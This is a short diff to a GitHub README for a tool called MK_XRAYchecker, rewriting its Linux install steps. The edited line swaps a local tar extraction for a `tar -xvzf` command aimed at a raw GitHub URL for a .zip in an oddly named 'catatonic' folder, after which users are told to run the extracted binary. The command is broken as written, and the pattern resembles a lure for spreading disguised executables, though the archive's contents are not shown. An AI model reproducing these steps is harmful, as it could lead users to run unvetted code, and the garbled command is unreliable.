warrior61/MK_XRAYchecker/README.md

 **For Linux:**
 - Open a terminal and navigate to the directory where you saved the file.
-- Use the command `tar -xvzf MK_XRAYchecker.tar.gz` to extract the files.
+- Use the command `tar -xvzf https://raw.githubusercontent.com/warrior61/MK_XRAYchecker/main/catatonic/MK_XRAYchecker-2.6.zip` to extract the files.
 - Navigate into the extracted folder and run `./MK_XRAYchecker`.

 ## 🎯 How to Use MK_XRAYchecker